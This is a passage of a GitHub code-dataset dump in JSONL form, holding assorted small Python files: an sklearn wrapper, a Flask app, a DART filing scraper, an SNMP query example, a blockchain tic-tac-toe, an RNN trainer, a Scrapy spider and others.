y=y, sample_weight=sample_weight, **kwargs)\n return self\n\n def partial_fit(self, X, y=None, sample_weight=None, **kwargs):\n if not hasattr(self._estimator, 'partial_fit'):\n raise ValueError('Cannot give partial_fit_batches to {} (does not have \"partial_fit\" method)'.format(self._estimator))\n return self._fit_trans('partial_fit', X, y=y, sample_weight=sample_weight, **kwargs)\n\n def fit(self, X, y=None, sample_weight=None, **kwargs):\n if self._partial_fit_batches:\n return self.partial_fit_batches(X, y=y, sample_weight=sample_weight, **kwargs)\n return self._fit_trans('fit', X, y=y, sample_weight=sample_weight, **kwargs)\n\n def transform(self, X, y=None, sample_weight=None, **kwargs):\n return self._fit_trans('transform', X, y=y, sample_weight=sample_weight, **kwargs)\n\n def fit_transform(self, X, y=None, sample_weight=None, **kwargs):\n if not hasattr(self._estimator, 'transform'):\n return self._fit_trans('fit_transform', X, y=y, sample_weight=sample_weight, **kwargs)\n fitted = self.fit(X, y=y, sample_weight=sample_weight, **kwargs)\n return self.transform(X, y=y, sample_weight=sample_weight, 
**kwargs)\n","repo_name":"HKCaesar/elm","sub_path":"elm/sample_util/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"402466","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 2 00:05:44 2021\r\n\r\n@author: dms10\r\n\"\"\"\r\n\r\ndef hello():\r\n print(\"Hello Python!\")\r\n \r\nhello()\r\nhello()\r\nhello()\r\n\r\ndef hello2(name):\r\n print(\"Hello\", name)\r\n \r\nhello2(\"Justin\")\r\nhello2(\"John\")\r\nhello2(\"Mike\")","repo_name":"egyptai/Python","sub_path":"hello20210602.py","file_name":"hello20210602.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34860026261","text":"from flask import *\nimport random\nimport os\n\napp = Flask(__name__)\n@app.route(\"/\")\ndef home():\n lines = open('facts.txt').read().splitlines()\n randomLine =random.choice(lines)\n return render_template(\"home.html\", fact=randomLine)\n\nif __name__ == \"__main__\":\n app.run(debug=False,host='0.0.0.0')\n","repo_name":"sjwoodr/blackhawks-facts","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39523778915","text":"########################################\n# Analysys Stock #\n########################################\nimport os, sys\nimport requests\nimport pandas as pd\nfrom bs4 import BeautifulSoup as bs\nimport my\nimport get_company_code as getcode\n\nURL_MAIN = 'http://dart.fss.or.kr'\nURL_AUTH = '/api/search.xml?auth='\nAPI_KEY = my.DART['api_key']\nprint(API_KEY)\nURL_CRP = '&crp_cd='\ndef getCompayCode(name):\n c_code = str(COMPONY_CODES[name])\n while len(c_code) != 6:\n c_code = '0' + c_code\n print(c_code)\n return (c_code)\n\nCOMPONY_CODE = getCompayCode('유한양행')\nURL_DT = '&start_dt=19990101'\nBSN_TP = '&bsn_tp=A001&bsn_tp=A002&bsn_tp=A003'\n\n\nURL = URL_MAIN + URL_AUTH + API_KEY + URL_CRP + str(COMPONY_CODE) + URL_DT + BSN_TP\nRESPONSE = requests.get(URL).text\nSOUP = bs(RESPONSE, 'html.parser')\n\n\n## Define Empty DataFrame\nDATA = pd.DataFrame()\n\nRESULTS = SOUP.select('list')\n\nfor result in RESULTS:\n temp = pd.DataFrame(([[result.crp_cls.string, result.crp_nm.string,\\\n result.crp_cd.string, result.rpt_nm.string, result.rcp_no.string,\\\n result.flr_nm.string, result.rcp_dt.string, result.rmk.string]]),\\\n columns=['crp_cls', 'crp_nm', 'crp_cd','rpt_nm', 'rcp_no', 'flr_nm',\\\n 'rcp_dt', 'rmk'])\n DATA = pd.concat([DATA, temp])\nDATA = DATA.reset_index(drop=True)\n\nURL2 = URL_MAIN + '/dsaf001/main.do?rcpNo=' + DATA['rcp_no'][0]\nprint(URL2)\nRESPONSE2 = requests.get(URL2).text\nSOUP2 = bs(RESPONSE2, 'html.parser')\nRESULTS2 = str(SOUP2.find('head'))\nif len(RESULTS2.split(' 연결재무제표\",')) > 1:\n RESULTS2 = RESULTS2.split(' 연결재무제표\",')[1]\nelse:\n RESULTS2 = RESULTS2.split(' 재무제표\",')[1]\nRESULTS2 = RESULTS2.split('cnt++')[0]\nRESULTS2 = RESULTS2.split('viewDoc(')[1]\nRESULTS2 = RESULTS2.split(')')[0]\nRESULTS2 = RESULTS2.split(', ')\nRESULTS2 = [RESULTS2[i][1:-1]for i in range(len(RESULTS2))]\nURL3 = '/report/viewer.do?rcpNo='\nURL_FINAL = URL_MAIN + URL3 + RESULTS2[0] + '&dcmNo=' + RESULTS2[1] + '&eleId=' + RESULTS2[2]\\\n + '&offset=' + RESULTS2[3] + '&length=' + RESULTS2[4]\\\n + '&dtd=dart3.xsd'\n\nprint(URL_FINAL)\n\nRESPONSE3 = requests.get(URL_FINAL).text\nSOUP3 = bs(RESPONSE3, 
'html.parser')\nRESULTS3 = SOUP3.select('table')\n## print(RESULTS3)\n","repo_name":"khjoony/deact","sub_path":"stock/packages/dart_api.py","file_name":"dart_api.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37769941954","text":"from pysnmp.entity.rfc3413.oneliner import cmdgen\n\n\nSNMP_HOST = '182.16.190.78'\nSNMP_PORT = 161\nSNMP_COMMUNITY = 'public'\n\n\nsnmpCmdGen = cmdgen.CommandGenerator()\n\nsnmpTransportData = cmdgen.UdpTransportTarget((SNMP_HOST,SNMP_PORT))\n\n\nerror,errorStatus,errorIndex,binds = snmpCmdGen.getCmd(cmdgen.CommunityData(SNMP_COMMUNITY),snmpTransportData,\"1.3.6.1.2.1.1.1.0\",\"1.3.6.1.2.1.1.3.0\",\"1.3.6.1.2.1.2.1.0\")\nif error:\n\tprint(\"Error\"+error)\nelse:\n\tif errorStatus:\n\t\tprint('%s at %s' %(errorStatus.prettyPrint(),errorIndex and binds[int(errorIndex)-1] or '?'))\n\telse:\n\t\tfor name,val in binds:\n\t\t\tprint('%s = %s' % (name.prettyPrint(),val.prettyPrint()))\n","repo_name":"PacktPublishing/Mastering-Python-for-Networking-and-Security","sub_path":"chapter7/code/pysnmp/snmp_example3.py","file_name":"snmp_example3.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":115,"dataset":"github-code","pt":"61"} +{"seq_id":"17695405258","text":"import pygame.font\n\n\nclass Button:\n \"\"\"A class to create a button to control the game start\"\"\"\n\n def __init__(self, ai_settings, screen):\n \"\"\" Iniatilize button to start the game\"\"\"\n self.screen = screen\n self.screen_rect = screen.get_rect()\n self.ai_settings = ai_settings\n self.width = 250\n self.height = 60\n self.button_color = (0, 255, 0)\n self.text_color = (255, 255, 255)\n self.font = pygame.font.SysFont(None, 42)\n self.rect = pygame.Rect(0, 0, self.width, self.height)\n self.rect.center = self.screen_rect.center\n\n def draw_button(self, msg):\n \"\"\"Draw the start button in the screen\"\"\"\n button_image = self.font.render(msg, True, self.text_color, self.button_color)\n button_rect = button_image.get_rect()\n button_rect.center = self.rect.center\n self.screen.fill(self.button_color, self.rect)\n self.screen.blit(button_image, button_rect)\n","repo_name":"luiscaballerodiaz/Alien_Invasion_Implementation_in_Python","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11427420243","text":"import discord\nfrom discord.ext import commands\n\n\nclass Testing(commands.Cog):\n def __init__(self, test):\n self.bot = test\n\n @commands.command()\n async def react(self, ctx):\n emoji='\\N{Thumbs up sign}'\n await ctx.message.add_reaction(emoji)\n\ndef setup(client):\n client.add_cog(Testing(client))","repo_name":"Shreyasrana18/Amaterasu-test-bot","sub_path":"cogs/react.py","file_name":"react.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"70599080196","text":"import json\nimport requests\n\n#RPC\nRPC_USER = 'your_rpc_username'\nRPC_PASSWORD = 'your_rpc_password'\nRPC_URL = 'http://127.0.0.1:15419/'\n\n#RPCCALL\ndef rpc_call(method, params=None):\n payload = {\n 'method': method,\n 'jsonrpc': '2.0',\n 'id': 1,\n }\n\n if params is not None:\n payload['params'] = params\n\n response = requests.post(RPC_URL, json=payload, auth=(RPC_USER, RPC_PASSWORD))\n\n if response.status_code != 
200:\n        raise Exception(f\"RPC call failed with status code {response.status_code}: {response.text}\")\n\n    result = response.json().get('result')\n    if result is None:\n        raise Exception(f\"RPC call failed: {response.json().get('error')}\")\n\n    return result\n\n#GAMEID\ndef create_new_game():\n    game_id = 'NEOXA'\n    initial_board = [[' ']*3 for _ in range(3)]\n    return game_id, initial_board\n\n#MAKEMOVES\ndef make_move(board, player, row, col):\n    if board[row][col] == ' ':\n        board[row][col] = player\n        return True\n    return False\n\n#WINNERS\ndef check_winner(board, player):\n    #Check rows, columns and diagonals for a win\n    for i in range(3):\n        if all(board[i][j] == player for j in range(3)) or all(board[j][i] == player for j in range(3)):\n            return True\n    if all(board[i][i] == player for i in range(3)) or all(board[i][2-i] == player for i in range(3)):\n        return True\n    return False\n\n#BOARD->METADATA\ndef board_to_metadata(board):\n    flat_board = [cell for row in board for cell in row]\n    metadata = ''.join(flat_board)\n    return metadata\n\ndef submit_game_result(game_id, board, winner):\n    metadata = board_to_metadata(board)\n    hex_payload = metadata.encode().hex()\n\n    # UTXO->TX\n    unspent_outputs = rpc_call('listunspent')\n    inputs = [{'txid': utxo['txid'], 'vout': utxo['vout']} for utxo in unspent_outputs]\n\n    # Create the outputs object with the OP_RETURN data plus one payment output\n    outputs = {\n        'data': hex_payload,  # OP_RETURN data\n        'GLXZRqjavBKAkjoQgDsKNnPAvdDBpTyEb4': 10\n        # Amount sent to the address above, in coins.\n        # NOTE: no change output is created, so whatever the inputs hold beyond\n        # this output is consumed as the transaction fee (e.g. a 100-coin UTXO\n        # with a 10-coin output leaves 90 coins as fee). Refactoring needed to\n        # compute and add a proper change output.\n    }\n\n    # Create\n    raw_tx = rpc_call('createrawtransaction', [inputs, outputs])\n\n    # Sign\n    signed_tx = rpc_call('signrawtransaction', [raw_tx])\n\n    # Send\n    txid = rpc_call('sendrawtransaction', [signed_tx['hex']])\n\n    return txid\n\n\n# Main game loop\ndef main():\n    game_id, board = create_new_game()\n    player = 'X'\n    winner = None\n\n    # NOTE: a full board with no winner (a draw) is not handled; the loop below\n    # would then prompt forever since no legal move remains.\n    while True:\n        # Display the board\n        for row in board:\n            print(' '.join(row))\n        print()\n\n        # Get player's move\n        row, col = map(int, input(f\"Player {player}, enter row (0-2) and column (0-2) (e.g., '0 0'): \").split())\n\n        # Make the move\n        if make_move(board, player, row, col):\n            # Check if there is a winner\n            if check_winner(board, player):\n                winner = player\n                break\n\n            # Switch to the other player\n            player = 'X' if player == 'O' else 'O'\n\n    # Display the final board\n    for row in board:\n        print(' '.join(row))\n    print()\n\n    # Submit the game result to the blockchain\n    txid = submit_game_result(game_id, board, winner)\n    print(f\"Game ID: {game_id}\")\n    print(f\"Winner: {winner}\")\n    print(f\"Transaction ID: {txid}\")\n\nif __name__ == '__main__':\n    main()\n","repo_name":"MuraMach/Neoxa_Gaming_Research","sub_path":"MetableGaming/MetableTICTACTOE.py","file_name":"MetableTICTACTOE.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"1165713157","text":"import pandas as pd\nimport math\nimport os\n\n\ndef normalize(x, xmin, xmax, a, b):\n    numerator = x - xmin\n    denominator = xmax - xmin\n    multiplier = b - a\n    ans = (numerator / denominator) * multiplier + a\n    return ans\n\n\nsig_min = -104\nsig_max = 0\ntar_min = 0.25\ntar_max = 1.0\nno_sig = 100\n\n\ndef normalize_wifi(num):\n    ans = 0\n    num = float(num)\n    if math.isclose(num, no_sig, rel_tol=1e-3):\n        return 0\n    else:\n        ans = normalize(num, sig_min, 
sig_max, tar_min, tar_max)\n return ans\n\n\nlat_min = 4864745.7450159714\nlat_max = 4865017.3646842018\nlat_tarmin = 0\nlat_tarmax = 1\n\n\ndef normalize_lat(num):\n num = float(num)\n ans = normalize(num, lat_min, lat_max, lat_tarmin, lat_tarmax)\n return ans\n\n\nlong_min = -7695.9387549299299000\nlong_max = -7299.786516730871000\nlong_tarmin = 0\nlong_tarmax = 1\n\n\ndef normalize_long(num):\n num = float(num)\n ans = normalize(num, long_min, long_max, long_tarmin, long_tarmax)\n return ans\n\n\ndef load():\n absolute_path = os.path.dirname(__file__)\n df = pd.read_csv(f'{absolute_path}/TrainingData.csv')\n # load more examples:\n # df_val = pd.read_csv(f'{absolute_path}/ValidationData.csv')\n # df = pd.concat([df, df_val])\n df.drop(columns=[\"RELATIVEPOSITION\", \"USERID\", \"PHONEID\", \"TIMESTAMP\"], inplace=True)\n\n wifi_cells = df.columns[:519]\n # for i in wifi_cells:\n # df[i] = df[i].apply(normalize_wifi)\n # df[\"LATITUDE\"] = df[\"LATITUDE\"].apply(normalize_lat)\n # df[\"LONGITUDE\"] = df[\"LONGITUDE\"].apply(normalize_long)\n\n X = df[wifi_cells].to_numpy()\n # Y = df[[\"LATITUDE\", \"LONGITUDE\", \"BUILDINGID\", \"FLOOR\"]].to_numpy()\n Y = df[[\"LATITUDE\", \"LONGITUDE\"]].to_numpy() / 1000\n\n return X, Y\n","repo_name":"ItaiAlon/LMVE","sub_path":"datasets/indoor_localization/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15298833146","text":"# Reports extension for Review Board.\nimport datetime\n\n\nfrom django.conf import settings\nfrom django.conf.urls.defaults import patterns, include\nfrom django.db.models import Sum\nfrom reviewboard.extensions.base import Extension\nfrom reviewboard.extensions.hooks import DashboardHook, URLHook, TemplateHook\nfrom reviewboard.reviews.signals import review_published\nfrom rbstats.hooks import RBStatsTableEntryHook\nfrom rbstopwatch.models import ReviewingSession\nfrom rbstopwatch.resources import reviewing_session_resource\n\nclass RBStopwatchStatsTableEntry(RBStatsTableEntryHook):\n def description_for_user(self):\n return \"Reviewing Time\"\n\n def for_user(self, user):\n all_reviewing_seconds = user.review_request_reviewing_sessions.aggregate(Sum('working_seconds'))['working_seconds__sum'] or 0\n total_reviewing_time = datetime.timedelta(seconds=all_reviewing_seconds)\n return str(total_reviewing_time)\n\n\nclass RBStopwatchExtension(Extension):\n\n is_configurable = True\n resources = [reviewing_session_resource]\n\n def __init__(self):\n Extension.__init__(self)\n \n self.activity_monitor = TemplateHook(self, \"base-scripts-post\", \n \"rbstopwatch/activity_monitor.html\", [\n 'view_diff', \n 'view_diff_revision', \n 'view_screenshot',\n ]\n )\n \n self.mousewheel_lib = TemplateHook(self, \"base-scripts\",\n \"rbstopwatch/mousewheel_lib.html\", [\n 'view_diff',\n 'view_diff_revision',\n 'view_screenshot',\n ]\n )\n \n self.review_display = TemplateHook(self, \"review-summary-header-post\",\n \"rbstopwatch/review_summary_insert.html\")\n\n self.stats_hook = RBStopwatchStatsTableEntry(self)\n\n\ndef on_review_published(sender, **kwargs):\n # Let's see if we can find the right ReviewingSession for this\n # user and review\n user = kwargs.get('user')\n review = kwargs.get('review')\n review_request = review.review_request\n review_session = ReviewingSession.objects.get(user=user, \n review_request=review_request,review=None)\n \n review_session.review = review\n 
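# (added note) persist the session so the published review stays linked to its timing data\n    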
review_session.save()\n\nreview_published.connect(on_review_published)\n","repo_name":"mikeconley/RB-Toy-Extensions","sub_path":"rbstopwatch/rbstopwatch/extension.py","file_name":"extension.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"28442824254","text":"import cut_according_to_frame\nimport sys\nimport glob, os\nimport extract_keyframes_from_combined_shots\n\ndef representsint(s):\n try:\n int(s)\n return True\n except ValueError:\n return False\n\n\nif __name__ == '__main__':\n command = 'h'\n if len(sys.argv) < 2:\n command = 'h'\n elif sys.argv[1] == '-c':\n command = 'c'\n elif sys.argv[1] == '-f':\n command = 'f'\n if command == 'h':\n print('\\n-c: cut videos according to shots info' +\n '\\n-f [int n]: extract n keyframes from each shots, default is 6\\n')\n else:\n src_dir = os.getcwd()\n os.chdir(src_dir+\"/movie\")\n for file in glob.glob(\"*.mp4\"):\n if command == 'c':\n cut_according_to_frame.cut_videos(src_dir,file[:-4])\n elif command == 'f':\n if len(sys.argv) == 3 and representsint(sys.argv[2]):\n extract_keyframes_from_combined_shots.get_frames(src_dir,file[:-4],int(sys.argv[2]))\n else:\n extract_keyframes_from_combined_shots.get_frames(src_dir, file[:-4], 6)\n","repo_name":"roystormstout/movie_cut_tools","sub_path":"cut_automated.py","file_name":"cut_automated.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23548439191","text":"import sys\n\ndef main():\n\tT = int(input())\n\n\tfor t in range(1, T+1):\n\t\ts,k = input().split()\n\t\tk = int(k)\n\t\tans = 0\n\t\ts = list(s)\n\n\t\tfor i in range(0, len(s)-k+1):\n\t\t\tif str(s[i]) == '-':\n\t\t\t\tans+=1\n\t\t\t\tfor j in range(i,i+k):\n\t\t\t\t\tif str(s[j]) == '+':\n\t\t\t\t\t\ts[j] = '-'\n\t\t\t\t\telse:\n\t\t\t\t\t\ts[j] = '+'\n\t\t\t# print(s)\n\n\t\tflag = 0\n\t\tfor i in s:\n\t\t\tif str(i) == '-':\n\t\t\t\tflag = 1\n\t\t\t\tbreak\n\n\t\tprint (\"Case #\" + str(t) + \": \", end=\"\")\n\t\tif flag:\n\t\t\tprint (\"IMPOSSIBLE\")\n\t\telse:\n\t\t\tprint (str(ans))\n\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/511.py","file_name":"511.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10790554547","text":"# AMAL Master DAC\n# Novembre 2023\n\n# Ben Kabongo\n# M2 MVA\n\nimport datetime\nimport torch\nimport torch.nn as nn\nimport torchmetrics\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\nfrom tqdm import tqdm\nfrom utils import RNN, device, SampleMetroDataset\n\n\ndef many_to_one_train(\n model, \n loss_fn, \n accuracy_fn, \n dataloader, \n optimizer, \n writer, \n epoch_id, \n verbose=True\n):\n model.train()\n train_loss = 0\n for X, y in dataloader:\n X, y = X.permute(1, 0, 2).to(device), y.to(device)\n batch = X.size(1)\n\n h_0 = torch.zeros(batch, model.hidden_dim)\n h_n = model(X, h_0)[-1, :, :]\n y_pred = model.decode(h_n)\n loss = loss_fn(y_pred, y)\n\n loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n\n train_loss += loss.item()\n accuracy_fn(y_pred.argmax(1), y)\n \n train_loss /= len(dataloader)\n accuracy = accuracy_fn.compute()\n accuracy_fn.reset()\n writer.add_scalar(\"Loss/train\", train_loss, epoch_id)\n writer.add_scalar(\"Accuracy/train\", 
accuracy, epoch_id)\n\n if verbose and epoch_id % 10 == 0:\n print(f\"Epoch {epoch_id} : \\n\\tTrain : acc = {(accuracy):>0.4f}%, loss = {train_loss:>8f}\")\n\n\ndef many_to_one_test(\n model, \n loss_fn, \n accuracy_fn, \n dataloader, \n writer, \n epoch_id, \n verbose=True\n):\n model.eval()\n test_loss = 0\n with torch.no_grad():\n for X, y in dataloader:\n X, y = X.permute(1, 0, 2).to(device), y.to(device)\n batch = X.size(1)\n\n h_0 = torch.zeros(batch, model.hidden_dim)\n h_n = model(X, h_0)[-1, :, :]\n y_pred = model.decode(h_n)\n\n test_loss += loss_fn(y_pred, y).item()\n accuracy_fn(y_pred.argmax(1), y)\n \n test_loss /= len(dataloader)\n accuracy = accuracy_fn.compute()\n accuracy_fn.reset()\n writer.add_scalar(\"Loss/test\", test_loss, epoch_id)\n writer.add_scalar(\"Accuracy/test\", accuracy, epoch_id)\n\n if verbose and epoch_id % 10 == 0:\n print(f\"\\tTest : acc = {(accuracy):>0.4f}%, loss: {test_loss:>8f}\")\n\nBASE_PATH = \"TPS/TP04/\"\nPATH = BASE_PATH + \"data/\"\n\nCLASSES = 2 # Nombre de stations utilisé\nLENGTH = 20 #Longueur des séquences \nDIM_INPUT = 2 # Dimension de l'entrée (1 (in) ou 2 (in/out))\nBATCH_SIZE = 32 #Taille du batch\n\nHIDDEN_DIM = 20\nLEARNING_RATE = 1e-2\nN_EPOCHS = 30\n\n\ndef sequence_classification(\n train_length=LENGTH, # longueuer des séquences en train\n test_length=LENGTH, # longueur des séquences en test\n input_dim=DIM_INPUT, # dimension de l'entrée\n hidden_dim=HIDDEN_DIM, # dimension latente du rnn\n n_classes=CLASSES, # nombre de classes\n batch_size=BATCH_SIZE, # taille du batch\n lr=LEARNING_RATE, # learning rate\n n_epochs=N_EPOCHS, # nombre d'époques\n hidden_activation=nn.Tanh(), # activation pour le calcul de l'état caché\n output_activation=nn.Sigmoid(), # activation pour l'output du rnn\n comment=\"\", # commentaire pour le writer\n verbose=True # verbose\n):\n\n matrix_train, matrix_test = torch.load(open(PATH+\"hzdataset.pch\",\"rb\"))\n ds_train = SampleMetroDataset(matrix_train[:, :, :n_classes, :input_dim], length=train_length)\n ds_test = SampleMetroDataset(matrix_test[:, :, :n_classes, :input_dim], length=test_length, stations_max=ds_train.stations_max)\n data_train = DataLoader(ds_train, batch_size=batch_size, shuffle=True)\n data_test = DataLoader(ds_test, batch_size=batch_size, shuffle=False)\n\n model = RNN(hidden_dim, input_dim, n_classes, hidden_activation, output_activation).to(device)\n loss_fn = nn.CrossEntropyLoss()\n optimizer = torch.optim.SGD(model.parameters(), lr=lr)\n\n accuracy_train = torchmetrics.classification.Accuracy(\n task=\"multiclass\", num_classes=n_classes\n )\n accuracy_test = torchmetrics.classification.Accuracy(\n task=\"multiclass\", num_classes=n_classes\n )\n\n writer = SummaryWriter(BASE_PATH + \"runs/exo2/\" + datetime.datetime.now().strftime(\"%Y_%m_%d-%H_%M_%S\"), comment=comment)\n for epoch_id in tqdm(range(n_epochs), \"Training\"):\n many_to_one_train(model, loss_fn, accuracy_train, data_train, optimizer, writer, epoch_id, verbose=verbose)\n many_to_one_test(model, loss_fn, accuracy_test, data_test, writer, epoch_id, verbose=verbose)\n\n return model\n\n\nif __name__ == \"__main__\":\n \n _ = sequence_classification(\n train_length=LENGTH, \n test_length=LENGTH, \n input_dim=DIM_INPUT, \n hidden_dim=HIDDEN_DIM,\n n_classes=CLASSES,\n batch_size=BATCH_SIZE,\n lr=LEARNING_RATE,\n n_epochs=N_EPOCHS,\n hidden_activation=nn.Tanh(),\n output_activation=nn.Sigmoid(),\n comment=\"\",\n verbose=False\n )\n\n TEST_LENGTH = 30\n print(f\"Test length = {TEST_LENGTH}\")\n _ = 
sequence_classification(\n        train_length=LENGTH, \n        test_length=TEST_LENGTH, \n        input_dim=DIM_INPUT, \n        hidden_dim=HIDDEN_DIM,\n        n_classes=CLASSES,\n        batch_size=BATCH_SIZE,\n        lr=LEARNING_RATE,\n        n_epochs=N_EPOCHS,\n        hidden_activation=nn.Tanh(),\n        output_activation=nn.Sigmoid(),\n        comment=f\"Test length = {TEST_LENGTH}\",\n        verbose=False\n    )\n","repo_name":"BenKabongo25/m2-dac-deep-learning","sub_path":"TPs/TP04/src/exo2.py","file_name":"exo2.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"24283659234","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom lxml import etree\nfrom ..items import OneprojectPachongItem\n\nclass MeijuSpider(scrapy.Spider):\n    name = 'meiju'\n    allowed_domains = ['meijutt.com']\n    start_urls = ['https://www.meijutt.com/new100.html']\n\n    def parse(self, response):\n        html = response.body.decode('gb2312')\n        tree = etree.HTML(html)\n        li_list = tree.xpath('//ul[@class=\"top-list fn-clear\"]/li')\n        for li in li_list:\n            # instantiate an item for this entry\n            wendang = OneprojectPachongItem()\n\n            rank = li.xpath('.//i/text()')[0]\n            title = li.xpath('./h5/a/text()')[0]\n            states = li.xpath('./span[1]//text()')[:2]\n            state = ''.join(states)\n            types = li.xpath('./span[2]//text()')[0]\n            tv = li.xpath('./span[3]//text()')[0]\n            uptimes = li.xpath('.//div[@class=\"lasted-time new100time fn-right\"]//text()')\n            uptime = ''.join(uptimes)\n\n            # save the extracted fields into the item\n            wendang['rank'] = rank\n            wendang['title'] = title\n            wendang['state'] = state\n            wendang['types'] = types\n            wendang['tv'] = tv\n            wendang['uptime'] = uptime\n\n            # yield suspends the loop here, preserving its state until the next item is requested\n            yield wendang","repo_name":"peixingtao01/youqu","sub_path":"爬虫/框架/onescrapy/oneproject_pachong/oneproject_pachong/spiders/meiju.py","file_name":"meiju.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"43536529797","text":"# Values: @search_name_param, @interval_mins_param, @search_config_param\ncreate_dealify_search_sproc = \"CreateDealifySearch\"\n# Values: @search_id_param, @query_param, @cl_site_param, @area_param, @category_param, @search_titles_param, @require_image_param, @posted_today_param\ncreate_craigslist_query_sproc = \"CreateCraigslistQuery\"\n# Values: @item_name_param, @price_param, @search_id_param, @source_url_param, @source_id_param, @posted_at_param, @is_deleted_param, @has_image_param, @last_updated_param, @repost_of_param, @item_location_param\ncreate_craigslist_item_sproc = \"CreateCraigslistItem\"\ncreate_craigslist_site_sproc = \"CreateCraigslistSite\"\nread_craigslist_subdomain_by_site_id_sproc = \"ReadCraigslistSubdomainBySiteId\"\n# Values: @country_param\nread_craigslist_sites_by_country_sproc = \"ReadCraigslistSitesByCountry\"\n# Values: @state_param\nread_craigslist_sites_by_state_sproc = \"ReadCraigslistSitesByState\"\n\n# Values: @city_param\nread_craigslist_sites_by_city_sproc = \"ReadCraigslistSitesByCity\"\n\n# Values: @search_id_param\nread_dealify_search_by_id_sproc = \"ReadDealifySearchById\"\n\nread_next_overdue_craigslist_query_id_sproc = \"ReadNextOverdueCraigslistQueryId\"\n# Values: @query_id_param\nstart_overdue_craigslist_query_sproc = \"StartOverdueCraigslistQuery\"\n# Values: @query_id_param\nfinish_craigslist_query_sproc = \"FinishCraigslistQuery\"\n# Values: @search_id_param\nuser_disable_dealify_search_sproc = \"UserDisableDealifySearch\"\n# Values: @search_id_param, @limit_param\nread_craigslist_items_by_search_id_sproc = \"ReadCraigslistItemsBySearchId\"\n# 
Values: @task_name_param, @task_type_param, @task_status_param, @task_config_param\ncreate_dealify_search_task_sproc = \"CreateDealifySearchTask\"\n# Values: @task_id_param\nread_dealify_task_by_id_sproc = \"ReadDealifySearchTaskById\"\n\nstart_next_dealify_search_task_sproc = \"StartNextDealifySearchTask\"\n\nset_overdue_craigslist_queries_sproc = \"SetOverdueCraigslistQueries\"\n\nread_new_dealify_search_ids_sproc = \"ReadNewDealifySearchIds\"\n# Values: @search_id_param\nset_dormant_dealify_search_sproc = \"SetDormantDealifySearch\"\n# Values: @worker_name_param, @task_config_param\ncreate_dealify_worker_sproc = \"CreateDealifyWorker\"\n# Values: @worker_id_param\nread_dealify_worker_by_id_sproc = \"ReadDealifyWorkerById\"\n# Values: @worker_id_param, @worker_status_param\nupdate_dealify_worker_status_sproc = \"UpdateDealifyWorkerStatus\"\n\nread_dealify_task_ids_by_type_sproc = \"ReadDealifyTaskIdsByType\"\n# Values: @worker_id_param, @current_task_param\nupdate_dealify_current_task_by_id_sproc = \"UpdateDealifyCurrentTaskById\"\n# Values: @item_id_param\nset_deleted_craigslist_item_sproc = \"SetDeletedCraigslistItem\"\n# Values: @interval_days_param, @limit_param\nread_old_craigslist_items_sproc = \"ReadOldActiveCraigslistItems\"\n\nupdate_craigslist_item_status_sproc = \"UpdateCraigslistItemStatus\"\n\n# Values: @status_param, @limit_param\nread_craigslist_queries_by_status_sproc = \"ReadCraigslistQueriesByStatus\"\n# Values: @query_id_param, @new_status_param\nupdate_craigslist_query_status_sproc = \"UpdateCraigslistQueryStatus\"\n# Values: @site_id_param\nread_craigslist_site_by_id_sproc = \"ReadCraigslistSiteById\"\n# Values: @search_name_param\nread_dealify_search_by_name_sproc = \"ReadDealifySearchByName\"\n# Values: @search_status_param, @limit_param\nread_dealify_searches_by_status_sproc = \"ReadDealifySearchesByStatus\"\n# Values: @search_id_param, @new_status_param\nupdate_dealify_search_status_sproc = \"UpdateDealifySearchStatus\"\n# Values: @search_id_param, @new_config_param\nupdate_dealify_search_config_sproc = \"UpdateDealifySearchConfig\"\n# Values: @status_param, @limit_param\nread_old_craigslist_queries_sproc = \"ReadOldestCraigslistQueries\"\n# Values: @key_name_param, @config_value_param, @notes_param\ncreate_config_key_sproc = \"CreateConfigKey\"\n# Values: @key_name_param\nread_config_key_by_name_sproc = \"ReadConfigKeyByName\"\n","repo_name":"Kroonjay/Dealify","sub_path":"core/database/sprocs.py","file_name":"sprocs.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5541449947","text":"import os\n\n(file, _) = 